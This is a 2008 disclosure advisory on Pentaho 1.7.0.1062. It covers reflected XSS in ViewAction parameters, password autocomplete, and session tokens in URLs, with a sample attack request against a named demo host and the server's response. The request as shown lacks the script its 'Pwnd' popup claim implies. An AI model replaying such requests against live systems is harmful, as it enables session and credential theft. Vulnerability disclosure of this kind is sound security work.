Pentaho 1.7.0.1062 Multiple Vulnerabilities Name Multiple Vulnerabilities in Pentaho Systems Affected Pentaho <= 1.7.0.1062 Severity High Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) Vendor http://www.pentaho.com Advisory http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com) Date 20081224 I. BACKGROUND Pentaho Analysis puts rich, analytic power in the hands of your business users helping them gain the insights and understanding they need to make optimal business decisions. II. DESCRIPTION Multiple vulnerabilities exist in Pentaho . III. ANALYSIS Summary: A) Reflected XSS B) Password field with autocomplete enabled C) Disclosure of Session Tokens in URL A) Reflected XSS The presence of the Cross Site Scripting plague has been veryfied on /pentaho/ViewAction parameters. The attacker-supplied code can perform different actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, an attacker can send to the victim a link containing a malicious URL in an email or instant message, instead of submit the link to popular web applications that don't escape HTML characters such as <>'\(). An example is the following: GET /pentaho/ViewAction?& outputType=khgj345kjh3535 &solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis HTTP/1.0 User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1 Host: demo1.opentaps.org:8181 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: it-IT,it;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path= Customer%20Analysis&action=CustomerLifeTimeOrders.xaction Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1 Cookie2: $Version=1 Proxy-Connection: Keep-Alive When the request will be executed, a popup showing the string Pwnd can be seen. Here the response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5 content-disposition: inline;filename=Customer_Lifetime_Orders.html Content-Type: text/html;charset=UTF-8 Content-Length: 1615 Date: Wed, 24 Dec 2008 09:55:32 GMT Connection: close
Failed |
||
Errore: SecureFilterComponent.ERROR_0001 -
"khgj345kjh3535"
non è una selezione consentita "outputType" per questo utente
(org.pentaho.plugin.core.SecureFilterComponent)Debug:
Partenza dellesecuzione di
{0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine) Debug: Lettura del contesto a runtime e dei dati (org.pentaho.core.solution.SolutionEngine) Debug: Caricamento del file di configurazione dell'Action Sequence (org.pentaho.core.solution.SolutionEngine) Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409, objectId=org.pentaho.core.runtime.RuntimeContext, messageType=action_sequence_start (org.pentaho.core.runtime.RuntimeContext) Errore: SecureFilterComponent.ERROR_0001 - "khgj345kjh3535" non è una selezione consentita "outputType" per questo utente (org.pentaho.plugin.core.SecureFilterComponent) Errore: RuntimeContext.ERROR_0012 - LActionDefinition per {0} non è stata eseguita con successo (org.pentaho.core.runtime.RuntimeContext) Errore: SolutionEngine.ERROR_0007 - Esecuzione dell'Action Sequence fallita (org.pentaho.core.solution.SolutionEngine) |
[it_41] Server Version Pentaho BI Platform 1.7.0.1062 The same servlet, /pentaho/ViewAction, contains other two parameters that are vulnerable to reflected XSS: "action" and "path" (that are exploitable in the same way). B) Password field with autocomplete enabled The response to this request: GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7 contains the login form where credentials are passed to the application. [...]